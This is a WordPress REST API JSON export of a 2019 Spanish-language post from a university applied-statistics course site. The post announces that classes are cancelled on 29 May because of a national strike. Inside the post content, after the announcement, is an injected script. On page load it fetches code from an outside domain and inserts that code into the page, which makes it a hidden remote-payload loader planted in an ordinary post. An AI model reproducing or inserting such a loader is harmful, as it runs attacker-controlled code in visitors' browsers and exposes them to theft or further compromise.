{"id":296,"date":"2019-05-28T09:30:59","date_gmt":"2019-05-28T12:30:59","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=296"},"modified":"2025-06-21T12:13:57","modified_gmt":"2025-06-21T15:13:57","slug":"no-habra-dictado-de-clases-el-29-05","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2019\/05\/28\/no-habra-dictado-de-clases-el-29-05\/","title":{"rendered":"No habr\u00e1 dictado de Clases el 29\/05-"},"content":{"rendered":"\n<p>Debido al paro nacional del pr\u00f3ximo 29 de mayo, no habr\u00e1 dictado de clases de Estad\u00edstica Aplicada, ya que en el mismo no habr\u00e1 transporte p\u00fablico de colectivos, afectando la llegada de los alumno como del personal de la facultad a la FAUD.<\/p>\n\n\n\n<p>Los d\u00edas y horarios de consultas, se mantienen durante la semana.<\/p>\n\n\n\n<p>Tambi\u00e9n, est\u00e9n atentos a los avisos por este medio, para la comunicaci\u00f3n de la fecha y horario del Recuperatorio del Parcial N\u00ba 2.<\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>Debido al paro nacional del pr\u00f3ximo 29 de mayo, no habr\u00e1 dictado de clases de Estad\u00edstica Aplicada, ya que en el mismo no habr\u00e1 transporte p\u00fablico de colectivos, afectando la llegada de los alumno como del personal de la facultad a la FAUD. Los d\u00edas y horarios de consultas, se mantienen durante la semana. Tambi\u00e9n,<\/p><\/div>\n<div class=\"blog-btn\"><a href=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2019\/05\/28\/no-habra-dictado-de-clases-el-29-05\/\" class=\"home-blog-btn\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,16,9,7],"tags":[],"class_list":["post-296","post","type-post","status-publish","format-standard","hentry","category-cursado","category-diseno-grafico","category-diseno-industrial","category-faud"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/296","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=296"}],"version-history":[{"count":2,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/296\/revisions"}],"predecessor-version":[{"id":874,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/296\/revisions\/874"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=296"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=296"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=296"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}